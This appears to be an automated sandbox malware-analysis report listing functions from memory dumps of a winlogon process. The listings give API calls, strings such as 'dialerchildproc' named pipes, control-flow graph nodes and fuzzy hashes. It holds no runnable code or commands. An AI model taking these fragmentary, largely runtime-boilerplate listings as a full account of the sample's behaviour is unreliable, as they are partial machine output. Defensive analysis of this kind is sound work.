1e8589e6bcc-1e8589e6bce 609->633 615 1e8589e6b45-1e8589e6b4d 610->615 616 1e8589e6b4f-1e8589e6b5d call 1e8589f5780 610->616 621 1e8589e6b63-1e8589e6b78 call 1e8589e6910 615->621 616->621 636 1e8589e6c15-1e8589e6c1d 616->636 621->609 621->636 624->593 646 1e8589e6a13-1e8589e6a1f call 1e8589e7180 624->646 625->624 674 1e8589e69de-1e8589e69e5 __scrt_dllmain_after_initialize_c 625->674 632->633 641 1e8589e6b9a-1e8589e6bbc call 1e8589e268c call 1e8589e6a78 632->641 634 1e8589e6bd5-1e8589e6bea call 1e8589e6910 633->634 635 1e8589e6bd0-1e8589e6bd3 633->635 634->636 655 1e8589e6bec-1e8589e6bf6 634->655 635->634 635->636 636->614 641->633 667 1e8589e6bbe-1e8589e6bc6 call 1e8589f5780 641->667 663 1e8589e6a45-1e8589e6a50 646->663 664 1e8589e6a21-1e8589e6a2b call 1e8589e7098 646->664 660 1e8589e6c01-1e8589e6c11 call 1e8589f5780 655->660 661 1e8589e6bf8-1e8589e6bff 655->661 660->636 661->636 663->597 664->663 673 1e8589e6a2d-1e8589e6a3b 664->673 667->633 673->663 674->624 675 1e8589e69e7-1e8589e6a04 call 1e8589eabc8 674->675 675->624
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 5e4911a06bc1a0225b864ec1f012cba216e1b87336e608d84dca3101b0553fc0
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: A5816D316342C1CBFAA6AB65D8413DDFAA0AF85780F58843B9E4D47796EF38C865C701
                          Function 000001E858986910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 464 1e858986910-1e858986916 465 1e858986951-1e85898695b 464->465 466 1e858986918-1e85898691b 464->466 469 1e858986a78-1e858986a8d 465->469 467 1e858986945-1e858986984 call 1e858986fc0 466->467 468 1e85898691d-1e858986920 466->468 484 1e858986a52 467->484 485 1e85898698a-1e85898699f call 1e858986e54 467->485 470 1e858986922-1e858986925 468->470 471 1e858986938 __scrt_dllmain_crt_thread_attach 468->471 472 1e858986a9c-1e858986ab6 call 1e858986e54 469->472 473 1e858986a8f 469->473 475 1e858986931-1e858986936 call 1e858986f04 470->475 476 1e858986927-1e858986930 470->476 479 1e85898693d-1e858986944 471->479 487 1e858986ab8-1e858986aed call 1e858986f7c call 1e858986e1c call 1e858987318 call 1e858987130 call 1e858987154 call 1e858986fac 472->487 488 1e858986aef-1e858986b20 call 1e858987190 472->488 477 1e858986a91-1e858986a9b 473->477 475->479 489 1e858986a54-1e858986a69 484->489 496 1e8589869a5-1e8589869b6 call 1e858986ec4 485->496 497 1e858986a6a-1e858986a77 call 1e858987190 485->497 487->477 498 1e858986b31-1e858986b37 488->498 499 1e858986b22-1e858986b28 488->499 517 1e858986a07-1e858986a11 call 1e858987130 496->517 518 1e8589869b8-1e8589869dc call 1e8589872dc call 1e858986e0c call 1e858986e38 call 1e85898ac0c 496->518 497->469 504 1e858986b39-1e858986b43 498->504 505 1e858986b7e-1e858986b94 call 1e85898268c 498->505 499->498 503 1e858986b2a-1e858986b2c 499->503 511 1e858986c1f-1e858986c2c 503->511 512 1e858986b45-1e858986b4d 504->512 513 1e858986b4f-1e858986b5d call 1e858995780 504->513 525 1e858986b96-1e858986b98 505->525 526 1e858986bcc-1e858986bce 505->526 514 1e858986b63-1e858986b78 call 1e858986910 512->514 513->514 530 1e858986c15-1e858986c1d 513->530 514->505 514->530 517->484 537 1e858986a13-1e858986a1f call 1e858987180 517->537 518->517 566 1e8589869de-1e8589869e5 __scrt_dllmain_after_initialize_c 518->566 525->526 534 1e858986b9a-1e858986bbc call 1e85898268c call 1e858986a78 525->534 527 1e858986bd0-1e858986bd3 526->527 528 1e858986bd5-1e858986bea call 1e858986910 526->528 527->528 527->530 528->530 546 1e858986bec-1e858986bf6 528->546 530->511 534->526 561 1e858986bbe-1e858986bc6 call 1e858995780 534->561 554 1e858986a21-1e858986a2b call 1e858987098 537->554 555 1e858986a45-1e858986a50 537->555 551 1e858986c01-1e858986c11 call 1e858995780 546->551 552 1e858986bf8-1e858986bff 546->552 551->530 552->530 554->555 567 1e858986a2d-1e858986a3b 554->567 555->489 561->526 566->517 568 1e8589869e7-1e858986a04 call 1e85898abc8 566->568 567->555 568->517
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 2273416eda205a835de9ccd1b838d3f7d5380a1bbd2954953cf4568a5117860d
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: D6819F317342C3CAFA929B65D8493DEF291AF85780F5480379E4D8B796DF39C9458B00
                          Function 000001E8589BCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 000001E8589BCE37
                          • FlsGetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE4C
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE6D
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE9A
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEAB
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEBC
                          • SetLastError.KERNEL32 ref: 000001E8589BCED7
                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF0D
                          • FlsSetValue.KERNEL32(?,?,00000001,000001E8589BECCC,?,?,?,?,000001E8589BBF9F,?,?,?,?,?,000001E8589B7AB0), ref: 000001E8589BCF2C
                            • Part of subcall function 000001E8589BD6CC: HeapAlloc.KERNEL32 ref: 000001E8589BD721
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF54
                            • Part of subcall function 000001E8589BD744: HeapFree.KERNEL32 ref: 000001E8589BD75A
                            • Part of subcall function 000001E8589BD744: GetLastError.KERNEL32 ref: 000001E8589BD764
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF65
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF76
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Value$ErrorLast$Heap$AllocFree
                          • String ID:
                          • API String ID: 570795689-0
                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction ID: 3c490d6acf1992e320168de973d9926605ee64eeb61e54e48ecf7625888e2c93
                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction Fuzzy Hash: A4416D312292C4CEFA68B771D5953FDF2425F857BAF14477BAC3E076E6DE2888018640
                          Function 000001E8589B2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                          • API String ID: 2171963597-1373409510
                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction ID: 1b119e999e0377ff32fa6a01d0b90dd197b3e79e90bf9ddc32d83b8a008cc649
                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction Fuzzy Hash: BB211036624680C6F710DB25F4443ADB7A1FB85BA5F504226DE5E02AA8DF7DC549CB00
                          Function 000001E8589BA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction ID: 456ede5cd129e004dcad9625f83eba4cfeb6527c6b4e1311171347c7d4774ba3
                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction Fuzzy Hash: 87E15972A29B84CAEB609F69D4803DDB7E0FB55B99F100126EE8D57B9ADF34C481C701
                          Function 000001E8589E9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction ID: 802e2edb749e698800fece1f633df5d8a36f3d8802d5387689ec9229da938b83
                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction Fuzzy Hash: 48E15A72624B81CBEF609B65D4813DDBBA4FB55B98F10012AEE8D57B9ACF34C4A1C700
                          Function 000001E858989944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction ID: 482f2ed3bbf1a5d302b22c37c74437017ab2248bb16c1b938e4fd7d10152e2c4
                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction Fuzzy Hash: B6E17E72624B82CAEB60DF65D4813DDB7A4FB55B98F100126EE8E57B9ACF34C491CB01
                          Function 000001E8589BF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3013587201-537541572
                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction ID: efdaad13b162fecd45176c1601fdd0d5fce348f0f9cb4d74c0640e0fd08a9e7f
                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction Fuzzy Hash: A241B032339A80D9FA16DB66E8187DDB392BF49BA1F09413B9D0E97785EE38C4458350
                          Function 000001E8589B104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction ID: b1163f3ad4a2c33dc659d8962ce8299cd05609ddf549d15265609a563b1be8b4
                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction Fuzzy Hash: E2416F73224BC4CAE760DF61E44439EB7A1F789B99F04812ADE8907758DF39C485CB00
                          Function 000001E8589BD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD087
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0A6
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0CE
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0DF
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Value
                          • String ID: 1%$Y%
                          • API String ID: 3702945584-1395475152
                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction ID: aa2ce87c2e5d08cf880b526a954400d7df811dd07e48bc34c2f6fbcce052a6f2
                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction Fuzzy Hash: 94113A317296C4CAFA68A735D9953FDF2416F847E1F285236AC2E076EADE2C84028600
                          Function 000001E8589B7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 424e5fee986169b2588fd60a7070510afe7af99a9e5ea540af609b12983588fe
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: 1C818B396282C1EFFB50AB65D8813EDF790AF85B82F14463BAD0C47796DE38C8458700
                          Function 000001E8589B9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction ID: 0874071610b75d78b137934d7bb3787c1ea270a088fa8bad8bb2fa6638c7f79b
                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction Fuzzy Hash: 4231A23133AAC1E9EE12DB52E4407DDB394BF48BA1F5905369D1E0B791EF39C4658310
                          Function 000001E8589C3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction ID: e4881fcce3081a0d908705cf576626470a6a90982aea8447793606719cd19703
                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction Fuzzy Hash: 27115B32320AC0C6E7519B52E84439DFBA0FB88FE5F04422AEE5E87795CF39C8148744
                          Function 000001E8589B2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: dialer
                          • API String ID: 756756679-3528709123
                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction ID: 22a39d6ef88b58d550097a84837a798e4384e01285b2469e00f0ad5875fd8a3e
                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction Fuzzy Hash: FD319F32725B95CAEA15DF96E5407ADFBA0FF44B82F0840369E4D47B59EF39C4A18700
                          Function 000001E8589BCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction ID: 1e0e9e661ea968faf47e5f9be1ba74f7c3a50c914e5506e2edc612bc17e3d70d
                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction Fuzzy Hash: B9115C312292C4CAFA64A771D5953FDF2526F897F6F14473AAC3F476DADE6884018600
                          Function 000001E8589B199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction ID: 8204dbe928e9efd943141ece04bc6ced883a62c760999c7dfaa781505eec1141
                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction Fuzzy Hash: FF010531324AC0C6EA54DB52E89879DB7A5BB88BC5F88403ADE4E43755DE3DC989C740
                          Function 000001E8589B36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction ID: e932fd6f93206b82514f0fe06f897a1b8c5f29290dfd6fa6980646282d759e98
                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction Fuzzy Hash: 1C011B753257C0CAEB259B62E84879DB7A0BF49B86F04043ACD4E17755EF3DC5088704
                          Function 000001E8589B8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                          • Instruction ID: 5270aa4372cfd9b7b3a25713a09ade675b46112c9520692bc64e2f6ee0a834c5
                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                          • Instruction Fuzzy Hash: 4D519B32739682CEEB15CB15E848B9DB7A6FB45B89F108536DE0A47788EF75C841D700
                          Function 000001E8589B1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction ID: 95a1c83f90eb46ab096ca1721357a1fe3062f153325f5557bc07c7ce8fdb596f
                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction Fuzzy Hash: 3DF03C323246C5D2EB609B61F8D479DBB60FB88B89F844036DE4D46959DE2DC68DCB00
                          Function 000001E8589BBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction ID: 001b9bb6c93794229350e6c80cd0198086eb55aa025ef2e010eccad3773778ae
                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction Fuzzy Hash: F3F06D71225AC4C2FB108B29E8443ADB720FF89BA1F54462BDE6E462E4CF2EC549C300
                          Function 000001E8589B3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction ID: 54657fac72875be1a94e19342f383fea5c2671d0b244a7b4eb32911dde1a2f06
                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction Fuzzy Hash: 43F05830228BC0C2EA008B52F9082ADBBA0AF48FC0F088136EE4E07B19DE2CC4498700
                          Function 000001E8589B5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                          • Instruction ID: e979bb5767f17a5875adf326a5af591250b36e9f9924a585dba8a17403db4fee
                          • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                          • Instruction Fuzzy Hash: F461B476629B84CAE7609B55E48439EF7A0FB88795F500126EA8E47BA8DF7CC440CF04
                          Function 000001E8589C4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
